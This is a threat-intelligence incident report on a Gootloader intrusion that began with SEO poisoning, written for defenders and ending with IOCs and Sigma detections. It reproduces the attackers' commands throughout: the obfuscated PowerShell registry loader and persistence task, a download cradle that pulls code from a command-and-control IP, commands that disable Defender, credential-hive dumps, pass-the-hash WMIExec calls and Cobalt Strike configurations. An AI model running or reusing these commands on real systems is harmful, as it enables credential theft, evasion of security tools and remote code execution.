1/31 May 9, 2022 SEO Poisoning – A Gootloader Story thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ In early February 2022, we witnessed an intrusion employing Gootloader (aka GootKit) as the initial access vector. The intrusion lasted two days and comprised discovery, persistence, lateral movement, collection, defense evasion, credential access and command and control activity. During the post-exploitation phase, the threat actors used RDP, WMI, Mimikatz, Lazagne, WMIExec, and SharpHound. The threat actors then used this access to review sensitive documents. Background Gootloader was the name assigned to the multi-staged payload distribution by Sophos in March 2021. The threat actors utilize SEO (search engine optimization) poisoning tactics to move compromised websites hosting malware to the top of certain search requests such as “what is the difference between a grand agreement and a contract?” or “freddie mac shared driveway agreement?” https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/ 2/31 When the user searches for these phrases and clicks on one of the top results, they are left with a forum looking web page where the user is instructed to download a file, which they accidently execute (double click to open). You can learn more about Gootloader by reading these references. 1 2 3 4 The researcher behind the @GootLoaderSites account is doing a great job of providing operational intelligence about the most recent malicious infrastructure. They also contact impacted businesses, monitor for newly created C2 addresses, and make the information public to the community. Thank you! Case Summary The intrusion started with a user searching Bing for “Olymplus Plea Agreement?”. The user then clicked on the second search result which led to the download and execution of a malicious javascript file (see video in Initial Access section). Upon execution, Gootloader utilized encoded PowerShell scripts to load Cobalt Strike into memory and persist on the host using a combination of registry keys and scheduled tasks. Fifteen minutes after the initial execution, we observed the threat actors using the PowerShell implementation of SharpHound (BloodHound) to discover attack paths in the Active Directory-based network. The threat actors collected the results and pivoted to another host via a Cobalt Strike PowerShell beacon. After pivoting, they disabled Windows Defender, before executing a second Cobalt Strike payload for a different command and control server. Around an hour after the initial infection, the threat actors ran LaZagne to retrieve all saved credentials from the pivoted workstation. https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/ https://www.sentinelone.com/labs/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/ https://redcanary.com/threat-detection-report/threats/gootkit/ https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/ https://twitter.com/GootLoaderSites https://thedfirreport.com/wp-content/uploads/2022/05/11462-01.png https://github.com/AlessandroZ/LaZagne 3/31 Meanwhile on the beachhead host, the threat actors ran Mimikatz via PowerShell to extract credentials. With those credentials, the threat actors used RDP from the beachhead host to the already compromised workstation host. They then targeted several other workstations with Cobalt Strike beacon executables; however, no further activity was observed on those endpoints other than the initial lateral movement. The threat actors favored RDP and remote WMI as their preferred methods to interact with the hosts and servers of interest throughout the rest of the intrusion. After around a four-hour pause of inactivity, the threat actors enabled restricted admin mode via WMI on a domain controller and logged in using RDP. The threat actors then used Lazagne again on the domain controller to extract more credentials. Our evidence shows that the attackers then began looking for interesting documents on file shares. They opened the documents one-by-one on the remote host via RDP. They directed their focus to documents with legal and insurance-related content. On the second and final day of the intrusion, the threat actors ran Advanced IP Scanner from the domain controller via the RDP session. Additionally, they inspected the file server and backup server, looking for more interesting data before leaving the network. Services We offer multiple services, including a Threat Feed service that tracks Command and Control frameworks such as Cobalt Strike, BazarLoader, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found here. We also have artifacts and IOCs available from this case, such as pcaps, memory captures, files, event logs including Sysmon, Kape packages, and more, under our Security Researcher and Organization services. Timeline https://thedfirreport.com/services/ https://thedfirreport.com/services/ https://www.patreon.com/thedfirreport 4/31 https://thedfirreport.com/wp-content/uploads/2022/05/SEO-Poisoning-A-Gootloader-Story-.png SEO Poisoning - A Gootloader Story 14:43 UTC Gootloader Execution — WScript.exe olympus_plea_agreement 34603 js. kakiosk.adsparkdev.com 35.206.117.64:443 J Cobalt Strike loaded into memory 146.70.78.43:443 ] 15:00 UTC Lateral Movement from Beachhead Host to Workstation #1 and Disabling of Defender Via PowerShell Remote Service 4 %YCOMSPECK% /b /c start /b /min powershell -nop -w hiciden - encodedcommand JABZADOA... powershell.exe -nop -w hidden -c Set- MpPreference -DisableRealtimeMonitoring $ 4 true 146.70.78.43:443 15:34 UTC Antivirus Check on Beachhead Host WMIC /Node:localhost /Namespace:\\root\ SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List 15:48 UTC LaZagne Execution on Workstation #1 ls.exe all -oN -output C:\Users ] 16:38 - 17:01 UTC Lateral Movement to Three Additional — User Workstations Remote Service Execution J \WWORKSTATION\ADMIN$\6bb6ca2.exe J 21:49 UTC RDP into File Share Server from Beachhead Restricted Admin Mode enabled via remote WMI prior to RDP connection — Dayl 14:58 UTC Discovery via Bloodhound L Invoke-BloodHound -CollectionMethad All 15:30 UTC Second Cobalt Strike Server on Workstation #1 L 37.120.198.225:443 15:44 UTC Mimikatz Execution on Beachhead Workstation L Invoke-Mimikatz 16:05 UTC RDP into Workstation #1 from Beachhead Host Restricted Admin Mode enabled via remote WMI prior to RDP connection reg add "hklm\system\currentcontrolset\, control\\sa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0 Microsoft Defender Scheduled Tasks Deleted C:\Windows\system32\schtasks.exe" / delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /F 21:34 UTC RDP into Domain Controller from Beachhead \_ Restricted Admin Mode enabled via remote WMI prior to RDP connection Invoke-WMIExec -Target DomainController -Domain domian.local -Username USER -Hash **** -Command " powershell.exe reg add 'hkim\system\currentcontrolset\ contral\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD / d 0" -verbose 4/31 5/31 Analysis and reporting completed by @kostastsale @iiamaleks @pigerlin Initial Access The threat actor gained initial access using Gootloader malware. Here’s a video of the user searching and downloading the malware via the poisoned SEO search. https://thedfirreport.com/wp-content/uploads/2022/05/SEO-Poisoning-A-Gootloader-Story-.png https://twitter.com/Kostastsale https://twitter.com/iiamaleks https://twitter.com/pigerlin 6/31 Watch Video At: https://youtu.be/IdR-tlv7w48 The Javascript file is then executed when double clicked after the zip is opened. Execution Gootloader upon execution creates two registry keys: HKCU:\SOFTWARE\Microsoft\Phone\Username HKCU:\SOFTWARE\Microsoft\Phone\Username0 The first is populated with an encoded Cobalt Strike payload and the latter is used to store a .NET loader named powershell.dll. https://youtu.be/IdR-tlv7w48 https://thedfirreport.com/wp-content/uploads/2022/05/11462-04.png 7/31 Following the Registry events, a PowerShell command was launched executing an encoded command. "powershell.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "/"e" NgAxA"DQANgA0ADkA"MgAxADEAOwB"zAGwAZQBlAHAAIAAtAHMAIAA4AD"MA"OwAkAG8AcABqAD0ARwBlAH"QA The PowerShell command will extract the .NET loader from HKCU:\SOFTWARE\Microsoft\Phone\Username0 and execute the code in memory via `Assembly.Load()`. 614649211; sleep -s 83; $opj=Get-ItemProperty -path ("hkcu:\software\microsoft\Phone\"+[Environment]::("username")+"0"); for ($uo=0;$uo - le 760;$uo++) { Try{$mpd+=$opj.$uo}Catch{} }; $uo=0; while($true) { $uo++;$ko= [math]::("sqrt")($uo); if($ko -eq 1000){break} } $yl=$mpd.replace("#",$ko); $kjb= [byte[]]::("new")($yl.Length/2); for($uo=0;$uo -lt $yl.Length;$uo+=2){ $kjb[$uo/2]= [convert]::("ToByte")($yl.Substring($uo,2),(2*8)) } [reflection.assembly]::("Load") ($kjb); [Open]::("Test")(); 6118985 This CyberChef recipe can be used to decode the related PS encoded payload. Once the PowerShell script is finished running, the next stage involves the .NET loader. The .NET loader will read HKCU:\SOFTWARE\Microsoft\Phone\Username and extract the encoded Cobalt Strike payload. This payload will be decoded and subsequently loaded into memory for execution. A simple encoding scheme is used where a letter will correspond to one of the hex characters (0-F), or alternately three zeros. https://thedfirreport.com/wp-content/uploads/2022/05/11462-05.png https://github.com/The-DFIR-Report/cyberchef-recipes/blob/main/SEO%20Poisoning%20-%20A%20GootLoader%20Story 8/31 q->000 v->0 w->1 r->2 t->3 y->4 u->5 i->6 o->7 p->8 s->9 q->A h->B j->C k->D l->E z->F The following shows the source code responsible for the core logic of the .NET loader. The below diagram summarizes the Gootloader initial execution. https://thedfirreport.com/wp-content/uploads/2022/05/11462-07.png 9/31 An excellent resource from Microsoft describes a set of configurations that can be applied to Windows that can stop .js files from executing, preventing this attack chain from ever getting off the ground. During later stages of the intrusion, Cobalt Strike was executed interactively through RDP on multiple systems. powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://37.120.198.225:80/trio'))" Persistence The Javascript (Gootloader) file invoked an encoded PowerShell command. The encoded PowerShell command creates a Scheduled Task that executes when the selected user logs on to the computer. An encoded PowerShell command is executed that will retrieve and execute the payload stored in the Registry. https://thedfirreport.com/wp-content/uploads/2022/05/11462-08.png https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-javascript-or-vbscript-from-launching-downloaded-executable-content 10/31 6876813; $a="NgAxADQANgA0ADkAMgAxADEAOwBzAGwAZQBlAHAAIAAtAHMAIAA4ADMAOwAkAG8AcABqAD0ARwBlAHQALQ $u=$env:USERNAME; Register-ScheduledTask $u -In (New-ScheduledTask -Ac (New-ScheduledTaskAction -E ([Diagnostics.Process]::GetCurrentProcess().MainModule.FileName) -Ar ("-w h -e "+$a)) -Tr (New-ScheduledTaskTrigger -AtL -U $u)); 30687851 Decoded PowerShell Payload: 6876813; 614649211; $a = "614649211"; sleep - s 83; $opj = Get - ItemProperty - path("hkcu:\software\microsoft\Phone\""+[Environment]::(" username ")+" 0 "); for ($uo = 0; $uo - le 760; $uo ++) { Try { $mpd += $opj.$uo } Catch {} }; $uo = 0; while ($true) { $uo ++; $ko = [math]::("sqrt")($uo); if ($ko - eq 1000) { break } } $yl = $mpd.replace("#", $ko); $kjb = [byte[]]::("new")($yl.Length / 2); for ($uo = 0; $uo - lt $yl.Length; $uo += 2) { $kjb[$uo / 2] = [convert]::("ToByte")($yl.Substring($uo, 2), (2 * 8)) }[reflection.assembly]::("Load")($kjb); [Open]::("Test")(); 611898544; $u = $env : USERNAME; Register - ScheduledTask $u - In(New - ScheduledTask - Ac(New - ScheduledTaskAction - E([Diagnostics.Process]::GetCurrentProcess().MainModule.FileName) - Ar("-w h -e " + $a)) - Tr(New - ScheduledTaskTrigger - AtL - U $u)); 306878516; The task created from the PowerShell script: 11/31 Defense Evasion Windows Defender scheduled scans were deleted from the system. This was observed on multiple servers the threat actor pivoted to. https://thedfirreport.com/wp-content/uploads/2022/05/11462-10.png 12/31 schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f Furthermore, PowerShell was used to disable multiple security features built into Microsoft Defender. Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableArchiveScanning $true Set-MpPreference -DisableBehaviorMonitoring $true Set-MpPreference -DisableIOAVProtection $true Set-MpPreference -DisableIntrusionPreventionSystem $true Set-MpPreference -DisableScanningNetworkFiles $true Set-MpPreference -MAPSReporting 0 Set-MpPreference -DisableCatchupFullScan $True Set-MpPreference -DisableCatchupQuickScan $True As in many cases involving Cobalt Strike, we observed rundll32 used to load the Cobalt Strike beacons into memory on the beachhead host. https://thedfirreport.com/wp-content/uploads/2022/05/11462-11.png https://thedfirreport.com/wp-content/uploads/2022/05/11462-12.png 13/31 This can be observed in the memory dump from the beachhead host with the tell-tale PAGE_EXECUTE_READWRITE protection settings on the memory space and MZ headers observable in the process memory space. 14/31 During the intrusion we observed various named pipes utilized by the threat actor’s Cobalt Strike beacons including default Cobalt Strike named pipes. https://thedfirreport.com/wp-content/uploads/2022/05/11462-13.png 15/31 PipeName: \msagent_ld PipeName: \1ea887 The threat actors were observed making use of double encoded Powershell commands. The first layer of encoding contains Hexadecimal and XOR encoding. The second layer of encoding contains a Base64 encoded string resulting in Gunzipped data. https://thedfirreport.com/wp-content/uploads/2022/05/11462-14.png https://thedfirreport.com/wp-content/uploads/2022/05/11462-15.png https://thedfirreport.com/wp-content/uploads/2022/05/11462-16.png 16/31 Decoding this script reveals that it is a publicly available WMIExec script for running remote WMI queries. Credential Access The malicious PowerShell process used by Gootloader dropped a PowerShell script named “mi.ps1” on the file system. Another PowerShell command was used to trigger the mi.ps1 script. The script was using XOR-encoding. powershell -nop -noni -ep bypass -w h -c ""$t=([type]'Convert');& ([scriptblock]::Create(($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name) ('NWYsOV90Zjxec3t0cmUxX3RlP0Z0c1J9eHR/ZTgqNWQsNWY/OTk5OTVmOD9BYl5ze3RyZT9cdGV5fnViOG0u {$_-bxor17}|%{[char]$_})-join''))"" https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-WMIExec.ps1 https://thedfirreport.com/wp-content/uploads/2022/05/11462-17.png https://thedfirreport.com/wp-content/uploads/2022/05/11462-18.png https://thedfirreport.com/wp-content/uploads/2022/05/11462-19.png 17/31 This CyberChef recipe can be used to decode the inner encoded command. The output lists “Invoke-Mimikatz”, a direct reference to the PowerShell Invoke-Mimikatz.ps1 script used to load Mimikatz DLL directly in memory. $u=('http://127.0.0.1:22201/'|%{(IRM $_)});$u|&(GCM I*e-E*); Import-Module C:\Users\ \mi.ps1; Invoke-Mimikatz -ComputerName Monitoring PowerShell event id 4103 we can observe the threat actor’s successful credential access activity from the Mimikatz invocation. In addition, the post-exploitation tool “LaZagne” (renamed to ls.exe) was used with the “-all” switch. ls.exe all -oN -output C:\Users\REDACTED This will dump passwords (browsers, LSA secret, hashdump, Keepass, WinSCP, RDPManager, OpenVPN, Git, etc.) and store the output file (in our case) in the “C:\Users” directory. When LaZagne is run with admin privileges, it also attempts to dump credentials from local registry hives, as can be seen below. https://github.com/The-DFIR-Report/cyberchef-recipes/blob/main/SEO%20Poisoning%20-%20A%20GootLoader%20Story https://thedfirreport.com/wp-content/uploads/2022/05/11462-20.png https://github.com/AlessandroZ/LaZagne 18/31 Here’s the commands from another system: cmd.exe /c "reg.exe save hklm\sam c:\users\REDACTED\appdata\local\temp\1\dznuxujzr" cmd.exe /c "reg.exe save hklm\system c:\users\REDACTED\appdata\local\temp\1\mkffdg" cmd.exe /c "reg.exe save hklm\security c:\users\REDACTED\appdata\local\temp\1\iszmqwmjemt" Discovery The threat actors used the PowerShell implementation of SharpHound (Bloodhound) on the beachhead host to enumerate the Active Directory domain. The Cobalt Strike beacon was used to invoke the PowerShell script. powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG They also ran a WMI command on the beachhead host and one other host to check for AntiVirus. WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List The threat actors executed this command remotely on a domain controller, before moving laterally to it: powershell.exe ls C:\ > C:\file.txt While having an interactive RDP session, in an attempt to collect more information regarding the host, the attackers used PowerShell to run systeminfo on one of the hosts they pivoted to. On the last day, and before they left the network, threat actors used Advanced IP Scanner to scan the whole network for the below open ports: 21,80,135,443,445,3389,8080,56133,58000,58157,58294,58682,60234,60461,64502 https://thedfirreport.com/wp-content/uploads/2022/05/11462-21.png 19/31 Lateral Movement As observed in many of our intrusions, the threat actor created and installed Windows services to deploy Cobalt Strike beacons. This method was used to pivot to other systems within the network. 20/31 SMB was also used to transfer executable Cobalt Strike beacons to various workstations in the environment. These executables were then executed by a remote service visible in the windows event id 7045 logs. Next to deploying Cobalt Strike beacons, the threat actor also used RDP to establish interactive sessions with various hosts on the network. One important aspect of these sessions is that the threat actor authenticated using “Restricted Admin Mode”. https://thedfirreport.com/wp-content/uploads/2022/05/11462-24.png https://thedfirreport.com/wp-content/uploads/2022/05/11462-25.png https://thedfirreport.com/wp-content/uploads/2022/05/11462-26.png 21/31 Restricted Admin Mode can be considered a double-edged sword; although it prevents credential theft, it also enables an attacker to perform a pass-the-hash attack using RDP. In other words, after enabling Restricted Admin Mode, just the NTLM hash of the remote desktop user is required to establish a valid RDP session, without the need of possessing the clear password. The threat actor attempted to use both Invoke-WMIExec and psexec to enable “Restricted Admin Mode”. psexec \\ -u \ -p reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0 powershell -nop -noni -ep bypass -w h -c "$u=('http://127.0.0.1:47961/'|%%{(IRM $_)});&(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\ \Invoke-WMIExec.ps1; Invoke-WMIExec -Target -Domain - Username -Hash -Command "powershell.exe New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'DisableRestrictedAdmin' -Value 0 -PropertyType DWORD" -verbose" The logon information of EventID 4624 includes a field “Restricted Admin Mode”, which is set to the value “Yes” if the feature is used. 22/31 https://thedfirreport.com/wp-content/uploads/2022/05/11462-27.png LoepName=Security EventCode=4624 EventType-8 SourceName=Micrasoft Windows security auditing. Type=Information RecordNumber=31774 Keywords=Audit Success TaskCategory=Logon OpCode=Info Message=An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: Account Domain: logon ID: Q@x3EF Logon Information: Loron Type: 18 Restricted Admin Mode: Yes Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: Account Name: Account Domain: logon ID: OxaT9RA24 Linked Logon ID: oxa Network Account Name: Network Account Domain: Logon GUID: {89000000-0000-6006-0000-8060000000000} Process Information: Process ID: Qx3fc Process Name: C:\Windows \System32\svchost. exe Network Information: Workstation Name: = Source Network Address: P| Source Port: 8 Detailed Authentication Information: lofon Process: User3? 22/31 23/31 Collection The threat actor accessed multiple files during the RDP sessions on multiple servers. In one instance document files were opened directly on the system. Shellbags reveled attempts to enumerate multiple file shares containing information of interest to the threat actor. Command and Control Gootloader Gootloader second stage download URLs. These URLs were deobfuscated and extracted using this script by HP Threat Research. They’ve updated this script at least a few times now, thanks @hpsecurity and thanks to @GootLoaderSites for sharing on twitter as its broken/fixed. hxxps://kakiosk.adsparkdev[.]com/test.php?hjkiofilihyl= hxxps://jp.imonitorsoft[.]com/test.php?hjkiofilihyl= hxxps://junk-bros[.]com/test.php?hjkiofilihyl= During the intrusion the Gootloader loader was observed communicating to 35.206.117.64:443 kakiosk[.]adsparkdev[.]com. https://thedfirreport.com/wp-content/uploads/2022/05/11462-27.png https://github.com/hpthreatresearch/tools/blob/main/gootloader/decode.py https://twitter.com/HPSecurity https://twitter.com/HPSecurity https://twitter.com/GootLoaderSites 24/31 Ja3:a0e9f5d64349fb13191bc781f81f42e1 Ja3s:567bb420d39046dbfd1f68b558d86382 Certificate: [d8:85:d1:48:a2:99:f5:ee:9d:a4:3e:01:1c:b0:ec:12:e5:23:7d:61 ] Not Before: 2022/01/05 09:25:33 UTC Not After: 2022/04/05 09:25:32 UTC Issuer Org: Let's Encrypt Subject Common: kakiosk.adsparkdev.com [kakiosk.adsparkdev.com ,www.kakiosk.adsparkdev.com ] Public Algorithm: rsaEncryption Cobalt Strike 146.70.78.43 Cobalt Strike server TLS configuration: 146.70.78.43 Ja3:72a589da586844d7f0818ce684948eea Ja3s:f176ba63b4d68e576b5ba345bec2c7b7 Serial Number: 146473198 (0x8bb00ee) Certificate: 73:6B:5E:DB:CF:C9:19:1D:5B:D0:1F:8C:E3:AB:56:38:18:9F:02:4F Not Before: May 20 18:26:24 2015 GMT Not After: May 17 18:26:24 2025 GMT Issuer: C=, ST=, L=, O=, OU=, CN= Subject: C=, ST=, L=, O=, OU=, CN= Public Algorithm: rsaEncryption Cobalt Strike beacon configuration: 25/31 Cobalt Strike Beacon: x86: beacon_type: HTTPS dns-beacon.strategy_fail_seconds: -1 dns-beacon.strategy_fail_x: -1 dns-beacon.strategy_rotate_seconds: -1 http-get.client: Cookie http-get.uri: 146.70.78.43,/visit.js http-get.verb: GET http-post.client: Content-Type: application/octet-stream id http-post.uri: /submit.php http-post.verb: POST maxgetsize: 1048576 port: 443 post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe process-inject.execute: CreateThread SetThreadContext CreateRemoteThread RtlCreateUserThread process-inject.startrwx: 64 process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648 process-inject.userwx: 64 proxy.behavior: 2 (Use IE settings) server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64 sleeptime: 60000 useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; yie9) uses_cookies: 1 watermark: 1580103824 x64: beacon_type: HTTPS dns-beacon.strategy_fail_seconds: -1 dns-beacon.strategy_fail_x: -1 dns-beacon.strategy_rotate_seconds: -1 http-get.client: Cookie http-get.uri: 146.70.78.43,/fwlink http-get.verb: GET http-post.client: Content-Type: application/octet-stream id http-post.uri: /submit.php http-post.verb: POST maxgetsize: 1048576 port: 443 post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe process-inject.execute: CreateThread SetThreadContext 26/31 CreateRemoteThread RtlCreateUserThread process-inject.startrwx: 64 process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648 process-inject.userwx: 64 proxy.behavior: 2 (Use IE settings) server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64 sleeptime: 60000 useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENXA) uses_cookies: 1 watermark: 1580103824 37.120.198.225 Cobalt Strike server TLS configuration: Ja3:72a589da586844d7f0818ce684948eea Ja3s:f176ba63b4d68e576b5ba345bec2c7b7 Serial Number: 146473198 (0x8bb00ee) Certificate: 73:6B:5E:DB:CF:C9:19:1D:5B:D0:1F:8C:E3:AB:56:38:18:9F:02:4F Not Before: May 20 18:26:24 2015 GMT Not After : May 17 18:26:24 2025 GMT Issuer: C=, ST=, L=, O=, OU=, CN= Subject: C=, ST=, L=, O=, OU=, CN= Public Algorithm: rsaEncryption Cobalt Strike beacon configuration: 27/31 Cobalt Strike Beacon: x86: beacon_type: HTTPS dns-beacon.strategy_fail_seconds: -1 dns-beacon.strategy_fail_x: -1 dns-beacon.strategy_rotate_seconds: -1 http-get.client: Cookie http-get.uri: 37.120.198.225,/cm http-get.verb: GET http-post.client: Content-Type: application/octet-stream id http-post.uri: /submit.php http-post.verb: POST maxgetsize: 1048576 port: 443 post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe process-inject.execute: CreateThread SetThreadContext CreateRemoteThread RtlCreateUserThread process-inject.startrwx: 64 process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648 process-inject.userwx: 64 proxy.behavior: 2 (Use IE settings) server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64 sleeptime: 60000 useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) uses_cookies: 1 watermark: 1580103824 x64: beacon_type: HTTPS dns-beacon.strategy_fail_seconds: -1 dns-beacon.strategy_fail_x: -1 dns-beacon.strategy_rotate_seconds: -1 http-get.client: Cookie http-get.uri: 37.120.198.225,/ptj http-get.verb: GET http-post.client: Content-Type: application/octet-stream id http-post.uri: /submit.php http-post.verb: POST maxgetsize: 1048576 port: 443 post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe process-inject.execute: CreateThread SetThreadContext 28/31 CreateRemoteThread RtlCreateUserThread process-inject.startrwx: 64 process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648 process-inject.userwx: 64 proxy.behavior: 2 (Use IE settings) server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64 sleeptime: 60000 useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB) uses_cookies: 1 watermark: 1580103824 Real Intelligence Threat Analytics (RITA) was successful in locating one of the IP addresses used for Cobalt Strike command and control communications. Netscan data extracted via Volatility from the beachhead host showing Cobalt Strike C2 connections: Volatility 3 Framework 2.0.0 Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created ... 0x948431c46010 TCPv4 10.X.X.X 52670 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe 0x948431e19010 TCPv4 10.X.X.X 63723 146.70.78.43 443 CLOSED 3420 rundll32.exe 0x9484337f18a0 TCPv4 10.X.X.X 52697 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe 0x948435102050 TCPv4 10.X.X.X 52689 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe ... Impact In this case, there was no further impact to the environment before the threat actors were evicted. Indicators Network https://github.com/activecm/rita https://thedfirreport.com/wp-content/uploads/2022/05/11462-30.png 29/31 Gootloader https://kakiosk.adsparkdev[.]com https://jp.imonitorsoft[.]com https://junk-bros[.]com 35.206.117.64:443 Cobalt Strike 146.70.78.43:443 37.120.198.225:443 File olympus_plea_agreement 34603 .js d7d3e1c76d5e2fa9f7253c8ababd6349 724013ea6906a3122698fd125f55546eac0c1fe0 6e141779a4695a637682d64f7bc09973bb82cd24211b2020c8c1648cdb41001b olympus plea agreement(46196).zip b50333ff4e5cbcda8b88ce109e882eeb 44589fc2a4d1379bee93282bbdb16acbaf762a45 7d93b3531f5ab7ef8d68fb3d06f57e889143654de4ba661e5975dae9679bbb2c mi.ps1 acef25c1f6a7da349e62b365c05ae60c c5d134a96ca4d33e96fb0ab68cf3139a95cf8071 d00edf5b9a9a23d3f891afd51260b3356214655a73e1a361701cda161798ea0b Invoke-WMIExec.ps1 b4626a335789e457ea48e56dfbf39710 62a7656d81789591358796100390799e83428519 c4939f6ad41d4f83b427db797aaca106b865b6356b1db3b7c63b995085457222 ls.exe 87ae2a50ba94f45da39ec7673d71547c dfa0b4206abede8f441fcdc8155803b8967e035c 8764131983eac23033c460833de5e439a4c475ad94cfd561d80cb62f86ff50a4 Detections Network ET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike ET MALWARE Meterpreter or Other Reverse Shell SSL Cert Sigma Custom Sigma rules Deleting Windows Defender scheduled tasks https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/Deleting%20Windows%20Defender%20scheduled%20tasks 30/31 Enabling restricted admin mode Using powershell specific download cradle OneLiner Using Lazagne to dump credentials Sigma repo rules Bloodhound Detection – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creati on_win_hack_bloodhound.yml Powershell download – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creati on_win_powershell_download_patterns.yml Defender Disable via Powershell – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creati on_win_powershell_defender_disable_feature.yml Creation of Scheduled Task via Powershell – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/powershell/powershell_script/ posh_ps_cmdlet_scheduled_task.yml LaZagne LSASS Access – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_access/proc_access _win_lazagne_cred_dump_lsass_access.yml Systeminfo Discovery – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creati on_win_susp_systeminfo.yml CobaltStrike Named Pipe – https://github.com/SigmaHQ/sigma/blob/7fb8272f948cc0b528fe7bd36df36449f74b2266/rules /windows/pipe_created/pipe_created_mal_cobaltstrike.yml Malicious PowerShell Commandlets – https://github.com/SigmaHQ/sigma/blob/becf3baeb4f6313bf267f7e8d6e9808fc0fc059c/rules/ windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml Suspicious Service Installation – https://github.com/SigmaHQ/sigma/blob/7d48d0e838b76f3fb5bc623e7ec45343cfac9c88/rule s/windows/builtin/system/win_susp_service_installation.yml Suspicious XOR Encoded PowerShell Command Line – https://github.com/SigmaHQ/sigma/blob/becf3baeb4f6313bf267f7e8d6e9808fc0fc059c/rules/ windows/powershell/powershell_classic/posh_pc_xor_commandline.yml Too Long PowerShell Commandlines – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creati on_win_long_powershell_commandline.yml PowerShell Network Connections – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/net_conn ection_win_powershell_network_connection.yml https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/Enabling%20restricted%20admin%20mode https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/Using%20powershell%20specific%20download%20cradle%20OneLiner https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/Using%20Lazagne%20to%20dump%20credentials https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml https://github.com/SigmaHQ/sigma/blob/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml https://github.com/SigmaHQ/sigma/blob/7fb8272f948cc0b528fe7bd36df36449f74b2266/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml 